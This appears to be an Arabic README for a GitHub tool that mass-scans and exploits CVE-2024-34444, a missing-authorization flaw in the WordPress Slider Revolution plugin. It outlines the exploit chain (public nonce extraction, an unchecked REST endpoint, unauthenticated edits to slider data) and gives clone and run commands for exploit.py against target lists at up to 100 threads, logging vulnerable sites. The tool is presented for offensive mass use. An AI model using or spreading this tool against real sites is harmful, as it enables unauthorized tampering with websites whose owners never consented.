
ماسح هائل متعدد الخيوط لـ CVE-2024-34444 (فقدان التفويض) في إضافة Slider Revolution لووردبريس. يقوم بأتمتة استخراج nonce، كشف الإصدار، واستغلال الثغرة عبر REST API لتعديل بيانات الشريحة بدون مصادقة.
ماسح جماعي احترافي لـ CVE-2024-34444 الذي يؤثر على إضافة Slider Revolution لووردبريس < 6.7.0
Banner
CVE-2024-34444 هي ثغرة تفويض مفقود في إضافة Slider Revolution لووردبريس (الإصدارات < 6.7.0). يقوم هذا الماسح بأتمتة اكتشاف واستغلال التثبيتات الضعيفة عبر نقطة نهاية REST API /wp-json/revslider/v1/slider/save.
سلسلة الثغرة:
revslider_actions من الواجهة الأمامية (متاح للعموم)check_nonce() في REST APIreadme.txt-v) لتسجيل مفصل-o) لحفظ النتائجgit clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# هدف واحد
python3 exploit.py -u https://target.com
# هدف واحد مع وضع مفصل
python3 exploit.py -u https://target.com -v
# مسح جماعي من قائمة
python3 exploit.py -l targets.txt -t 20
# مسح جماعي مع ملف إخراج
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# مثال كامل بكل الخيارات
python3 exploit.py -l targets.txt -t 100 -o results.txt -v